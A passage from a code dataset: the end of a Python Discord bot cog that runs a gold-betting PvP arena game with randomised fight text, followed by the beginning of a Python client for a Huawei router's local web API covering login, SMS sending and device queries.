\r\n def nationCheck(self, user : discord.User):\r\n Roles = user.roles\r\n for Role in Roles[:]:\r\n if Role.id == \"220742745420070923\": #TheKingdom\r\n return 2\r\n elif Role.id == \"220742070246047745\": #TheEmpire\r\n return 3\r\n elif Role.id == \"220741512818982913\": #TheTheocracy\r\n return 4\r\n else:\r\n pass\r\n return 1 #unranked\r\n \r\n def nationNameCheck(self, number):\r\n if number == 2: #TheKingdom\r\n return \"The Kingdom\"\r\n elif number == 3: #TheEmpire\r\n return \"The Empire\"\r\n elif number == 4: #TheTheocracy\r\n return \"The Theocracy\"\r\n else:\r\n return \"The Sorcerer Kingdom\"\r\n \r\n def randomStart(self, author):\r\n goodOutcome = {}\r\n goodOutcome['1'] = '{0} made the first move by dashing directly towards the opponent.'.format(author)\r\n goodOutcome['2'] = '{0} watched carefully and started approaching slowly.'.format(author)\r\n goodOutcome['3'] = '{0} tried to use random movement to throw off their opponent, heading towards them in a beeline.'.format(author)\r\n goodOutcome['4'] = '{0} growled in a fierce manner and charged.'.format(author)\r\n good = random.choice([goodOutcome[i] for i in goodOutcome])\r\n return good\r\n \r\n def randomStartResponse(self, author):\r\n goodOutcome = {}\r\n goodOutcome['1'] = '{0} held their weapon tight in preperation.'.format(author)\r\n goodOutcome['2'] = '{0} stepped backwards, anticipating the attack.'.format(author)\r\n 
goodOutcome['3'] = '{0} ran towards their opponent, trying to match their strategy.'.format(author)\r\n goodOutcome['4'] = '{0} started rocking side to side in an attempt to roll at the last moment.'.format(author)\r\n good = random.choice([goodOutcome[i] for i in goodOutcome])\r\n return good\r\n \r\n def randomPlace(self):\r\n goodOutcome = {}\r\n goodOutcome['1'] = 'high ground'\r\n goodOutcome['2'] = 'low ground'\r\n goodOutcome['3'] = 'side'\r\n goodOutcome['4'] = 'air'\r\n goodOutcome['5'] = 'ground'\r\n goodOutcome['6'] = 'wall'\r\n goodOutcome['7'] = 'dirt'\r\n good = random.choice([goodOutcome[i] for i in goodOutcome])\r\n return good\r\n \r\n def randomAttack(self):\r\n goodOutcome = {}\r\n goodOutcome['1'] = 'swing'\r\n goodOutcome['2'] = 'smash'\r\n goodOutcome['3'] = 'swipe'\r\n goodOutcome['4'] = 'poke'\r\n goodOutcome['5'] = 'stab'\r\n goodOutcome['6'] = 'slash'\r\n goodOutcome['7'] = 'jab'\r\n good = random.choice([goodOutcome[i] for i in goodOutcome])\r\n return good\r\n \r\n def randomDefend(self):\r\n goodOutcome = {}\r\n goodOutcome['1'] = 'block'\r\n goodOutcome['2'] = 'parry'\r\n goodOutcome['3'] = 'dodge'\r\n goodOutcome['4'] = 'counter'\r\n goodOutcome['5'] = 'deflect'\r\n good = random.choice([goodOutcome[i] for i in goodOutcome])\r\n return good\r\n \r\n def randomBody(self):\r\n goodOutcome = {}\r\n goodOutcome['1'] = 'head'\r\n goodOutcome['2'] = 'left arm'\r\n goodOutcome['3'] = 'right arm'\r\n goodOutcome['4'] = 'left leg'\r\n goodOutcome['5'] = 'right leg'\r\n goodOutcome['6'] = 'face'\r\n goodOutcome['7'] = 'body'\r\n goodOutcome['8'] = 'stomach'\r\n goodOutcome['9'] = 'torso'\r\n goodOutcome['10'] = 'back'\r\n goodOutcome['11'] = 'foot'\r\n goodOutcome['12'] = 'hand'\r\n goodOutcome['13'] = 'shoulder'\r\n goodOutcome['14'] = 'knee'\r\n good = random.choice([goodOutcome[i] for i in goodOutcome])\r\n return good\r\n \r\n def randomWeapon(self,):\r\n goodOutcome = {}\r\n goodOutcome['1'] = 'Sword'\r\n goodOutcome['2'] = 'Long Sword'\r\n goodOutcome['3'] = 'Knife'\r\n goodOutcome['4'] = 'Axe'\r\n goodOutcome['5'] = 'Hammer'\r\n goodOutcome['6'] = 'Scimitar'\r\n goodOutcome['7'] = 'Katana'\r\n goodOutcome['8'] = 'Great Sword'\r\n goodOutcome['9'] = 'Cleaver'\r\n goodOutcome['10'] = 'Brass Knuckles'\r\n good = random.choice([goodOutcome[i] for i in goodOutcome])\r\n return good\r\n \r\n def goodFight(self, authorOne, authorTwo, weaponOne, weaponTwo):\r\n place = self.randomPlace()\r\n attack = self.randomAttack()\r\n defend = self.randomDefend()\r\n body = self.randomBody()\r\n weapon = self.randomWeapon()\r\n outcome = {}\r\n outcome['1'] = authorOne + ' attacked with the ' + weaponOne + ' they carried. Trying to ' + attack + ' ' + authorTwo + ' and managing to score a hit on their ' + body + '.' \r\n outcome['2'] = 'The ' + weaponOne + ' and ' + weaponTwo + ' clashed as sparks illuminated the fighters faces. But ' + authorOne + ' used the ' + place + ' to their advantage and hit ' + authorTwo + '.' \r\n outcome['3'] = 'Picking up a random ' + weapon + ' off the ground, ' + authorOne + ' managed to hit ' + authorTwo + ' in the ' + body + '.' \r\n outcome['4'] = authorTwo + ' got knocked back into a wall and was forced to retreat as ' + authorOne + ' used the flat part of their ' + weaponOne + ' to harm ' + authorTwo + ' in the ' + body + '.' \r\n outcome['5'] = 'Using a great deal of force, ' + authorOne + ' managed to push ' + authorTwo + ' back and trip them up. 
Causing the ' + weaponTwo + ' they were carrying to injure them.'\r\n good = random.choice([outcome[i] for i in outcome])\r\n return good\r\n \r\n def midFight(self, authorOne, authorTwo, weaponOne, weaponTwo):\r\n place = self.randomPlace()\r\n attack = self.randomAttack()\r\n defend = self.randomDefend()\r\n body = self.randomBody()\r\n weapon = self.randomWeapon()\r\n outcome = {}\r\n outcome['1'] = authorOne + ' moved about carefully, considering if they could hurt ' + authorTwo + ' in the ' + body + '.' \r\n outcome['2'] = 'The ' + place + ' would be a good place to fight from. At least that\\'s what ' + authorOne + ' thought.'\r\n outcome['3'] = 'There was a ' + weapon + ' lying on the floor that ' + authorOne + ' thought of utilising.'\r\n outcome['4'] = authorOne + ' wondered if a ' + attack + ' hit ' + authorTwo + ' in the ' + body + ', whether it would do much damage or not.'\r\n outcome['5'] = 'A ' + defend + ' may be the best thing to do. ' + authorOne + ' prepared themselves in advance.'\r\n good = random.choice([outcome[i] for i in outcome])\r\n return good\r\n \r\n def badFight(self, authorOne, authorTwo, weaponOne, weaponTwo):\r\n place = self.randomPlace()\r\n attack = self.randomAttack()\r\n defend = self.randomDefend()\r\n body = self.randomBody()\r\n weapon = self.randomWeapon()\r\n outcome = {}\r\n outcome['1'] = 'Pushing their advantage too far, ' + authorOne + ' was shocked as the ' + weaponOne + ' they were using was easily stopped as ' + authorTwo + ' performed a ' + defend + ' and they were hurt instead.'\r\n outcome['2'] = 'Thinking that the ' + place + ' could have been used to hit ' + authorTwo + ', ' + authorOne + ' was suprised to find themselves hit in the ' + body + '.' \r\n outcome['3'] = authorOne + ' tripped and hurt their ' + body + ', giving ' + authorTwo + ' the advantage.' \r\n outcome['4'] = 'As ' + authorOne + ' and ' + authorTwo + ' clashed their weapons the ' + weaponTwo + ' that ' + authorTwo + ' was using hit ' + authorOne + ' in the ' + body + '.' \r\n outcome['5'] = authorOne + ' fell backwards and hit their ' + body + ' as ' + authorTwo + ' used their ' + weaponTwo + ' to do extra damage, despite the way ' + authorOne + ' tried to ' + defend + '.' \r\n out = random.choice([outcome[i] for i in outcome])\r\n return out\r\n \r\n @commands.cooldown(1, 300, commands.BucketType.user) \r\n @commands.command(pass_context=True, no_pm=True)\r\n async def pvp(self, ctx, bet: int):\r\n \"\"\"Arena PVP, requires 2 players\"\"\"\r\n author = ctx.message.author\r\n server = ctx.message.server\r\n chn = ctx.message.channel\r\n ready = False\r\n if self.account_check(author):\r\n if bet >= 50 and bet <= 3000:\r\n if self.enough_points(author, bet):\r\n pass\r\n else:\r\n await self.bot.say(\"You do not have enough gold.\")\r\n return\r\n else:\r\n await self.bot.say(\"You need to bet more than 50 and less than 3,000 Gold.\")\r\n return\r\n else:\r\n await self.bot.say(\"You cannot issue a challenge without an account first. 
Type '# bank register' to register with the Guild.\") \r\n return\r\n code = \"pvp \" + str(bet)\r\n await self.bot.say(author.name + \" has issued a challenge with a bet of \" + str(bet) + \" Gold!\" + \"\\n\" +\r\n \"To fight him enter '\" + code + \"' to accept the challenge!\")\r\n endtime = time.time() + 60\r\n while time.time() < endtime:\r\n msg = await self.bot.wait_for_message(timeout=60, channel=chn)\r\n if msg is not None:\r\n if msg.content == code:\r\n author2 = msg.author\r\n if author != author2:\r\n if self.account_check(author2):\r\n if self.enough_points(author2, bet):\r\n ready = True\r\n break\r\n else:\r\n await self.bot.say(\"You do not have enough gold.\")\r\n else:\r\n await self.bot.say(\"You cannot issue a challenge without an account first. Type '# bank register' to register with the Guild.\") \r\n else:\r\n await self.bot.say(\"You can't challenge yourself.\")\r\n else:\r\n pass\r\n else: \r\n pass\r\n if ready == True:\r\n pass\r\n else:\r\n await self.bot.say(\"Apparently no one wants to challenge you \" + author.mention + \"!\") \r\n return\r\n bank = self.bot.get_cog('Economy').bank\r\n bank.withdraw_gold(author, bet) \r\n bank.withdraw_gold(author2, bet) \r\n await self.bot.say(author.mention + \"! You have been challenged by \" + author2.mention + \" to a 1 on 1 battle!\")\r\n await asyncio.sleep(3)\r\n await self.bot.say(\"The location is an arena inside The Empire!\") \r\n Fighter1Role = self.roleCheck(author)\r\n Fighter1Nation = self.nationCheck(author)\r\n Fighter1RoleName = self.roleNameCheck(Fighter1Role)\r\n Fighter1NationName = self.nationNameCheck(Fighter1Nation)\r\n Fighter2Role = self.roleCheck(author2)\r\n Fighter2Nation = self.nationCheck(author2)\r\n Fighter2RoleName = self.roleNameCheck(Fighter2Role)\r\n Fighter2NationName = self.nationNameCheck(Fighter2Nation)\r\n Fighter1Weapon = self.randomWeapon()\r\n while True:\r\n Fighter2Weapon = self.randomWeapon()\r\n if Fighter2Weapon == Fighter1Weapon:\r\n Fighter2Weapon = self.randomWeapon()\r\n else:\r\n break\r\n else:\r\n pass\r\n points1 = 0\r\n points2 = 0\r\n await asyncio.sleep(3)\r\n await self.bot.say(\"Our Champion in this battle is a \" + Fighter1RoleName + \" rank fighter from \" + Fighter1NationName + \"!\") \r\n await asyncio.sleep(4)\r\n await self.bot.say(\"The Challenger is a \" + Fighter2RoleName + \" rank fighter from \" + Fighter2NationName + \"!\")\r\n await asyncio.sleep(3)\r\n await self.bot.say(\"Good luck to the both of you!\")\r\n await asyncio.sleep(5)\r\n await self.bot.say(author.name + \" walked in with their \" + Fighter1Weapon + \" looking confident.\")\r\n await asyncio.sleep(3)\r\n await self.bot.say(author2.name + \" came in holding their \" + Fighter2Weapon + \" looking equally confident.\") \r\n await asyncio.sleep(5)\r\n lst = ['...'] * 8 \r\n Roll1 = randint(0, 10)\r\n Roll2 = randint(0, 10)\r\n while True:\r\n Roll1 = randint(0, 300) + (Fighter1Role * 10)\r\n if Roll1 == Roll2:\r\n pass\r\n elif Roll1 > Roll2:\r\n #Add Player 1 start\r\n lst[0] = self.randomStart(author.name)\r\n lst[1] = self.randomStartResponse(author2.name)\r\n break\r\n elif Roll2 > Roll1:\r\n #Add PLayer 2 start\r\n lst[0] = self.randomStart(author2.name)\r\n lst[1] = self.randomStartResponse(author.name)\r\n break\r\n else:\r\n pass\r\n else:\r\n pass\r\n Fighter1Bonus = Fighter1Role * 100\r\n Fighter2Bonus = Fighter2Role * 100\r\n Fighter1Hit = 100 + (Fighter1Bonus / 2) - (Fighter2Bonus / 10)\r\n Fighter2Hit = 100 + (Fighter2Bonus / 2) - (Fighter1Bonus / 10)\r\n for i in 
range(5):\r\n Roll1 = randint(0, 1001)\r\n Roll2 = randint(0, 1001)\r\n if Roll1 > 0 and Roll1 < Fighter1Hit:\r\n #Player 1 lands a hit and Player 2 suffers.\r\n msg = self.goodFight(author.name, author2.name, Fighter1Weapon, Fighter2Weapon)\r\n points1 = points1 + 1\r\n elif Roll1 > Fighter1Hit and Roll1 < Fighter1Bonus:\r\n msg = self.midFight(author.name, author2.name, Fighter1Weapon, Fighter2Weapon)\r\n else:\r\n #bad message\r\n msg = self.badFight(author.name, author2.name, Fighter1Weapon, Fighter2Weapon)\r\n points2 = points2 + 1\r\n lst[i + 2] = msg\r\n #Next Player\r\n if Roll1 > 0 and Roll1 < Fighter2Hit:\r\n #Player 1 lands a hit and Player 2 suffers.\r\n msg2 = self.goodFight(author2.name, author.name, Fighter2Weapon, Fighter1Weapon)\r\n points2 = points2 + 1\r\n elif Roll1 > Fighter2Hit and Roll1 < Fighter2Bonus:\r\n msg2 = self.midFight(author2.name, author.name, Fighter2Weapon, Fighter1Weapon)\r\n else:\r\n #bad message\r\n msg2 = self.badFight(author2.name, author.name, Fighter2Weapon, Fighter1Weapon)\r\n points1 = points1 + 1\r\n lst[i + 3] = msg2\r\n for i in range(8): \r\n await self.bot.say(lst[i]) \r\n await asyncio.sleep(4)\r\n #Tally result\r\n prize = bet * 2\r\n while True:\r\n if points1 > points2:\r\n if abs(points1-points2):\r\n await self.bot.say(\"As the battle neared its end, \" + author2.name + \" took their final breath and collapsed.\")\r\n await self.bot.say(\"It seems like they died.\")\r\n if author.id == '159043902383456257':\r\n await self.bot.say(\"As expected of Ainz-Sama!\")\r\n await asyncio.sleep(3)\r\n elif author2.id == '159043902383456257':\r\n await self.bot.say(\"I find it hard to understand why Ainz-Sama let you win! He even took lots of damage right now.\")\r\n await asyncio.sleep(3)\r\n await self.bot.say(\"No there must be a reason behind it....Ahh it was a lesson for you after all!\")\r\n await asyncio.sleep(3)\r\n await self.bot.say(\"As expected of Ainz-Sama!\")\r\n await asyncio.sleep(3) \r\n elif Fighter1Role == 100:\r\n await self.bot.say(\"As expected from a servant of Ainz-Sama!\")\r\n await asyncio.sleep(3)\r\n elif Fighter2Role == 100:\r\n await self.bot.say(\"It's utterly disgraceful that a servant of Ainz-Sama could fail like this!\")\r\n await asyncio.sleep(3)\r\n await self.bot.say(\"I'll have to question whether you should be allowed to stay within Nazarick or not.\")\r\n await asyncio.sleep(3)\r\n else:\r\n pass\r\n await self.bot.say(author2.name + \" is fortunate that Ainz-Sama used revival magic on them.\")\r\n await asyncio.sleep(3)\r\n bank.deposit_gold(author, prize)\r\n if author.id == '159043902383456257':\r\n await self.bot.say(\"The winner is \" + author.mention + \"-Sama! Here is \" + str(prize) + \" Gold!\")\r\n else:\r\n await self.bot.say(\"The winner is \" + author.mention + \"! They won \" + str(prize) + \" Gold!\")\r\n return\r\n else:\r\n await self.bot.say(\"The battle drew to a close and \" + author2.name + \" fainted.\")\r\n await asyncio.sleep(3)\r\n await self.bot.say(\"They lost to the opponent.\")\r\n await asyncio.sleep(3)\r\n if author.id == '159043902383456257':\r\n await self.bot.say(\"As expected of Ainz-Sama!\")\r\n await asyncio.sleep(3)\r\n elif author2.id == '159043902383456257':\r\n await self.bot.say(\"I find it hard to understand why Ainz-Sama let you win! 
He even took lots of damage right now.\")\r\n await asyncio.sleep(3)\r\n await self.bot.say(\"No there must be a reason behind it....Ahh it was a lesson for you after all!\")\r\n await asyncio.sleep(3)\r\n await self.bot.say(\"As expected of Ainz-Sama!\")\r\n await asyncio.sleep(3) \r\n elif Fighter1Role == 100:\r\n await self.bot.say(\"As expected from a servant of Ainz-Sama!\")\r\n await asyncio.sleep(3)\r\n elif Fighter2Role == 100:\r\n await self.bot.say(\"It's utterly disgraceful that a servant of Ainz-Sama could fail like this!\")\r\n await asyncio.sleep(3)\r\n await self.bot.say(\"I'll have to question whether you should be allowed to stay within Nazarick or not.\")\r\n await asyncio.sleep(3)\r\n else:\r\n pass\r\n bank.deposit_gold(author, prize)\r\n if author.id == '159043902383456257':\r\n await self.bot.say(\"The winner is \" + author.mention + \"-Sama! Here is \" + str(prize) + \" Gold!\")\r\n else:\r\n await self.bot.say(\"The winner is \" + author.mention + \"! They won \" + str(prize) + \" Gold!\")\r\n return\r\n elif points2 > points1:\r\n if abs(points1-points2):\r\n await self.bot.say(\"As the battle neared its end, \" + author.name + \" took their final breath and collapsed.\")\r\n await asyncio.sleep(3)\r\n await self.bot.say(\"It seems like they died.\")\r\n await asyncio.sleep(3)\r\n if author2.id == '159043902383456257':\r\n await self.bot.say(\"As expected of Ainz-Sama!\")\r\n await asyncio.sleep(3)\r\n elif author.id == '159043902383456257':\r\n await self.bot.say(\"I find it hard to understand why Ainz-Sama let you win! He even took lots of damage right now.\")\r\n await asyncio.sleep(3)\r\n await self.bot.say(\"No there must be a reason behind it....Ahh it was a lesson for you after all!\")\r\n await asyncio.sleep(3)\r\n await self.bot.say(\"As expected of Ainz-Sama!\")\r\n await asyncio.sleep(3) \r\n elif Fighter2Role == 100:\r\n await self.bot.say(\"As expected from a servant of Ainz-Sama!\")\r\n await asyncio.sleep(3)\r\n elif Fighter1Role == 100:\r\n await self.bot.say(\"It's utterly disgraceful that a servant of Ainz-Sama could fail like this!\")\r\n await asyncio.sleep(3)\r\n await self.bot.say(\"I'll have to question whether you should be allowed to stay within Nazarick or not.\")\r\n await asyncio.sleep(3)\r\n else:\r\n pass\r\n bank.deposit_gold(author2, prize)\r\n await self.bot.say(\"The winner is \" + author2.mention + \"! They won \" + str(prize) + \" Gold!\")\r\n return\r\n else:\r\n await self.bot.say(\"The battle drew to a close and \" + author.name + \" fainted.\")\r\n await asyncio.sleep(3)\r\n await self.bot.say(\"They lost to the opponent.\")\r\n await asyncio.sleep(3)\r\n if author2.id == '159043902383456257':\r\n await self.bot.say(\"As expected of Ainz-Sama!\")\r\n await asyncio.sleep(3)\r\n elif author.id == '159043902383456257':\r\n await self.bot.say(\"I find it hard to understand why Ainz-Sama let you win! 
He even took lots of damage right now.\")\r\n await asyncio.sleep(3)\r\n await self.bot.say(\"No there must be a reason behind it....Ahh it was a lesson for you after all!\")\r\n await asyncio.sleep(3)\r\n await self.bot.say(\"As expected of Ainz-Sama!\")\r\n await asyncio.sleep(3) \r\n elif Fighter2Role == 100:\r\n await self.bot.say(\"As expected from a servant of Ainz-Sama!\")\r\n await asyncio.sleep(3)\r\n elif Fighter1Role == 100:\r\n await self.bot.say(\"It's utterly disgraceful that a servant of Ainz-Sama could fail like this!\")\r\n await asyncio.sleep(3)\r\n await self.bot.say(\"I'll have to question whether you should be allowed to stay within Nazarick or not.\")\r\n await asyncio.sleep(3)\r\n else:\r\n pass\r\n bank.deposit_gold(author2, prize)\r\n await self.bot.say(\"The winner is \" + author2.mention + \"! They won \" + str(prize) + \" Gold!\")\r\n return\r\n else:\r\n final = randint(1,2)\r\n if final == 1:\r\n points1 = points1 + 1\r\n else:\r\n points2 = points2 + 1\r\n \r\n \r\n \r\n @pvp.error\r\n async def pvp_error(self, error, ctx):\r\n if isinstance(error, commands.CommandOnCooldown):\r\n await self.bot.say(error) \r\n \r\ndef setup(bot):\r\n n = Arena(bot)\r\n bot.add_cog(n) ", "sub_path": "arena.py", "file_name": "arena.py", "file_ext": "py", "file_size_in_byte": 25778, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "73", "api": [{"api_name": "discord.User", "line_number": 32, "usage_type": "attribute"}, {"api_name": "discord.User", "line_number": 85, "usage_type": "attribute"}, {"api_name": "random.choice", "line_number": 114, "usage_type": "call"}, {"api_name": "random.choice", "line_number": 123, "usage_type": "call"}, {"api_name": "random.choice", "line_number": 135, "usage_type": "call"}, {"api_name": "random.choice", "line_number": 147, "usage_type": "call"}, {"api_name": "random.choice", "line_number": 157, "usage_type": "call"}, {"api_name": "random.choice", "line_number": 176, "usage_type": "call"}, {"api_name": "random.choice", "line_number": 191, "usage_type": "call"}, {"api_name": "random.choice", "line_number": 206, "usage_type": "call"}, {"api_name": "random.choice", "line_number": 221, "usage_type": "call"}, {"api_name": "random.choice", "line_number": 236, "usage_type": "call"}, {"api_name": "time.time", "line_number": 263, "usage_type": "call"}, {"api_name": "time.time", "line_number": 264, "usage_type": "call"}, {"api_name": "asyncio.sleep", "line_number": 293, "usage_type": "call"}, {"api_name": "asyncio.sleep", "line_number": 314, "usage_type": "call"}, {"api_name": "asyncio.sleep", "line_number": 316, "usage_type": "call"}, {"api_name": "asyncio.sleep", "line_number": 318, "usage_type": "call"}, {"api_name": "asyncio.sleep", "line_number": 320, "usage_type": "call"}, {"api_name": "asyncio.sleep", "line_number": 322, "usage_type": "call"}, {"api_name": "asyncio.sleep", "line_number": 324, "usage_type": "call"}, {"api_name": "random.randint", "line_number": 326, "usage_type": "call"}, {"api_name": "random.randint", "line_number": 327, "usage_type": "call"}, {"api_name": "random.randint", "line_number": 329, "usage_type": "call"}, {"api_name": "random.randint", "line_number": 351, "usage_type": "call"}, {"api_name": "random.randint", "line_number": 352, "usage_type": "call"}, {"api_name": "asyncio.sleep", "line_number": 378, "usage_type": "call"}, {"api_name": "asyncio.sleep", "line_number": 388, "usage_type": "call"}, {"api_name": "asyncio.sleep", "line_number": 391, "usage_type": "call"}, 
{"api_name": "asyncio.sleep", "line_number": 393, "usage_type": "call"}, {"api_name": "asyncio.sleep", "line_number": 395, "usage_type": "call"}, {"api_name": "asyncio.sleep", "line_number": 398, "usage_type": "call"}, {"api_name": "asyncio.sleep", "line_number": 401, "usage_type": "call"}, {"api_name": "asyncio.sleep", "line_number": 403, "usage_type": "call"}, {"api_name": "asyncio.sleep", "line_number": 407, "usage_type": "call"}, {"api_name": "asyncio.sleep", "line_number": 416, "usage_type": "call"}, {"api_name": "asyncio.sleep", "line_number": 418, "usage_type": "call"}, {"api_name": "asyncio.sleep", "line_number": 421, "usage_type": "call"}, {"api_name": "asyncio.sleep", "line_number": 424, "usage_type": "call"}, {"api_name": "asyncio.sleep", "line_number": 426, "usage_type": "call"}, {"api_name": "asyncio.sleep", "line_number": 428, "usage_type": "call"}, {"api_name": "asyncio.sleep", "line_number": 431, "usage_type": "call"}, {"api_name": "asyncio.sleep", "line_number": 434, "usage_type": "call"}, {"api_name": "asyncio.sleep", "line_number": 436, "usage_type": "call"}, {"api_name": "asyncio.sleep", "line_number": 448, "usage_type": "call"}, {"api_name": "asyncio.sleep", "line_number": 450, "usage_type": "call"}, {"api_name": "asyncio.sleep", "line_number": 453, "usage_type": "call"}, {"api_name": "asyncio.sleep", "line_number": 456, "usage_type": "call"}, {"api_name": "asyncio.sleep", "line_number": 458, "usage_type": "call"}, {"api_name": "asyncio.sleep", "line_number": 460, "usage_type": "call"}, {"api_name": "asyncio.sleep", "line_number": 463, "usage_type": "call"}, {"api_name": "asyncio.sleep", "line_number": 466, "usage_type": "call"}, {"api_name": "asyncio.sleep", "line_number": 468, "usage_type": "call"}, {"api_name": "asyncio.sleep", "line_number": 476, "usage_type": "call"}, {"api_name": "asyncio.sleep", "line_number": 478, "usage_type": "call"}, {"api_name": "asyncio.sleep", "line_number": 481, "usage_type": "call"}, {"api_name": "asyncio.sleep", "line_number": 484, "usage_type": "call"}, {"api_name": "asyncio.sleep", "line_number": 486, "usage_type": "call"}, {"api_name": "asyncio.sleep", "line_number": 488, "usage_type": "call"}, {"api_name": "asyncio.sleep", "line_number": 491, "usage_type": "call"}, {"api_name": "asyncio.sleep", "line_number": 494, "usage_type": "call"}, {"api_name": "asyncio.sleep", "line_number": 496, "usage_type": "call"}, {"api_name": "random.randint", "line_number": 503, "usage_type": "call"}, {"api_name": "discord.ext.commands.cooldown", "line_number": 239, "usage_type": "call"}, {"api_name": "discord.ext.commands", "line_number": 239, "usage_type": "name"}, {"api_name": "discord.ext.commands.BucketType", "line_number": 239, "usage_type": "attribute"}, {"api_name": "discord.ext.commands.command", "line_number": 240, "usage_type": "call"}, {"api_name": "discord.ext.commands", "line_number": 240, "usage_type": "name"}, {"api_name": "discord.ext.commands.CommandOnCooldown", "line_number": 513, "usage_type": "attribute"}, {"api_name": "discord.ext.commands", "line_number": 513, "usage_type": "name"}]}
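The five-round loop in the arena record above draws one randint(0, 1001) roll per fighter and buckets it against that fighter's hit and bonus thresholds. A minimal standalone sketch of the same three-way bucketing, with hypothetical threshold values (the real thresholds come from weapon and role lookups earlier in the cog):

from random import randint

def resolve_round(hit, bonus):
    # One roll per fighter: strictly below `hit` is a clean hit, strictly
    # between `hit` and `bonus` a middling exchange, anything else a miss.
    # Note the boundary gap: a roll exactly equal to `hit` falls through
    # to the miss branch, mirroring the strict comparisons in the cog.
    roll = randint(0, 1001)
    if 0 < roll < hit:
        return 'good'
    elif hit < roll < bonus:
        return 'mid'
    return 'bad'

# Hypothetical thresholds, for illustration only.
print(resolve_round(hit=500, bonus=800))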
+{"seq_id": "640679409", "text": "#!/usr/bin/env python2\n#\n# coding: utf-8\n#\n\nimport requests\nimport xmltodict\nimport uuid\nimport hashlib\nimport hmac\nimport logging\nfrom binascii import hexlify\nfrom collections import OrderedDict\nfrom datetime import datetime\n\n\nclass HuaweiAPIException(Exception):\n def __init__(self, value):\n self.value = value\n\n def __str__(self):\n return repr(self.value)\n\n\nclass HuaweiAPI:\n HOME_URL = \"http://{host}/html/home.html\"\n API_URL = \"http://{host}/api/\"\n\n def __init__(self, passwd, host=\"192.168.8.1\", user=\"admin\", logfile=None):\n if logfile:\n logging.basicConfig(filename=logfile)\n stderrLogger = logging.StreamHandler()\n stderrLogger.setFormatter(logging.Formatter(logging.BASIC_FORMAT))\n logging.getLogger().addHandler(stderrLogger)\n self.log = logging.getLogger(\"huawei-api\")\n self.api_url = self.API_URL.format(host=host)\n self.session = requests.Session()\n self.log.debug(\"Connect to {host}\".format(host=host))\n try:\n self.session.get(self.HOME_URL.format(host=host),\n timeout=(5.0, 5.0))\n except Exception as e:\n raise HuaweiAPIException(\"Connection failed: \" + str(e))\n dev_info = self.device_info()\n if dev_info:\n self.log.info(\"Detected Device: \" + dev_info['devicename'])\n self.log.debug(\"Authenticate for user \" + user)\n self.__login(user, passwd)\n\n def __get_client_proof(self, clientnonce, servernonce,\n password, salt, iterations):\n msg = \"%s,%s,%s\" % (clientnonce, servernonce, servernonce)\n salted_pass = hashlib.pbkdf2_hmac('sha256', password,\n bytearray.fromhex(salt), iterations)\n client_key = hmac.new(b'Client Key', msg=salted_pass,\n digestmod=hashlib.sha256)\n stored_key = hashlib.sha256()\n stored_key.update(client_key.digest())\n signature = hmac.new(msg.encode('utf_8'),\n msg=stored_key.digest(), digestmod=hashlib.sha256)\n client_key_digest = client_key.digest()\n signature_digest = signature.digest()\n client_proof = bytearray()\n i = 0\n while i < client_key.digest_size:\n val = ord(client_key_digest[i]) ^ ord(signature_digest[i])\n client_proof.append(val)\n i = i + 1\n return hexlify(client_proof)\n\n def __login(self, user, password):\n d = OrderedDict()\n d['username'] = user\n client_nonce = uuid.uuid4().hex + uuid.uuid4().hex\n d['firstnonce'] = client_nonce\n d['mode'] = 1\n data_login = self.__api_post('user/challenge_login', d)\n d = OrderedDict()\n proof = self.__get_client_proof(client_nonce,\n data_login['servernonce'],\n password,\n data_login['salt'],\n int(data_login['iterations']))\n d['clientproof'] = proof\n d['finalnonce'] = data_login['servernonce']\n self.__api_post('user/authentication_login', d)\n if self.__api_request('user/state-login'):\n return True\n return False\n\n def __get_token(self, session=True):\n api_method_url = 'webserver/SesTokInfo'\n if session:\n r = self.session.get(url=self.api_url + api_method_url,\n allow_redirects=False, timeout=(1.5, 1.5))\n else:\n r = requests.get(url=self.api_url + api_method_url,\n allow_redirects=False, timeout=(1.5, 1.5))\n if r.status_code != 200:\n raise HuaweiAPIException(\"Error getting token .HTTP error: %d\" %\n r.status_code)\n return xmltodict.parse(r.text)['response']['TokInfo']\n\n def __api_request(self, api_method_url, session=True):\n headers = {'__RequestVerificationToken': self.__get_token(session)}\n try:\n r = self.session.get(url=self.api_url + api_method_url,\n headers=headers,\n allow_redirects=False, timeout=(1.5, 1.5))\n except requests.exceptions.RequestException as e:\n raise 
HuaweiAPIException(\"Request %s failed: %s\" %\n (api_method_url, str(e)))\n if r.status_code != 200:\n raise HuaweiAPIException(\"Request returned HTTP error %d\" %\n r.status_code)\n self.log.debug(\"Request: \" + api_method_url +\n \"\\nResponse:\\n\" + r.content)\n resp = xmltodict.parse(r.text).get('error', None)\n if resp is not None:\n error_code = resp['code']\n raise HuaweiAPIException(\"Request returned error \" + error_code)\n resp = xmltodict.parse(r.text).get('response', None)\n if resp is None:\n raise HuaweiAPIException(\"Request returned empty response\")\n else:\n return resp\n\n def __api_post(self, api_method_url, data, session=True):\n headers = {'__RequestVerificationToken': self.__get_token(session)}\n request = {}\n request['request'] = data\n try:\n r = self.session.post(url=self.api_url + api_method_url,\n data=xmltodict.unparse(request, pretty=True),\n headers=headers, timeout=(1.5, 1.5))\n except requests.exceptions.RequestException as e:\n raise HuaweiAPIException(\"Request %s failed: %s\" %\n (api_method_url, str(e)))\n if r.status_code != 200:\n raise HuaweiAPIException(\"Request returned HTTP error %d\" %\n r.status_code)\n self.log.debug(\"Request: \" + api_method_url +\n \"\\nResponse:\\n\" + r.content)\n resp = xmltodict.parse(r.text).get('error', None)\n if resp is not None:\n error_code = resp['code']\n raise HuaweiAPIException(\"Request returned error \" + error_code)\n resp = xmltodict.parse(r.text).get('response', None)\n if resp is None:\n raise HuaweiAPIException(\"Request returned empty response\")\n else:\n return resp\n\n def send_sms(self, number, text):\n d = OrderedDict()\n d['Index'] = -1\n d['Phones'] = {'Phone': number}\n d['Sca'] = ''\n d['Content'] = text\n d['Length'] = len(text)\n d['Reserved'] = 1\n d['Date'] = datetime.now().strftime(\"%Y-%m-%d %H:%M:%S\")\n self.__api_post('sms/send-sms', d)\n\n def device_info(self):\n return self.__api_request('device/basic_information', session=False)\n\n def state_login(self):\n return self.__api_request('user/state-login')\n\n def check_notifications(self):\n return self.__api_request('monitoring/check-notifications')\n\n def device_signal(self):\n return self.__api_request('device/signal')\n\n def net_mode(self, params=None):\n if params is None:\n return self.__api_request('net/net-mode')\n else:\n return self.__api_post('net/net-mode', params)\n\n def net_mode_list(self, params=None):\n if params is None:\n return self.__api_request('net/net-mode-list')\n else:\n return self.__api_post('net/net-mode-list', params)\n\n", "sub_path": "huawei_api.py", "file_name": 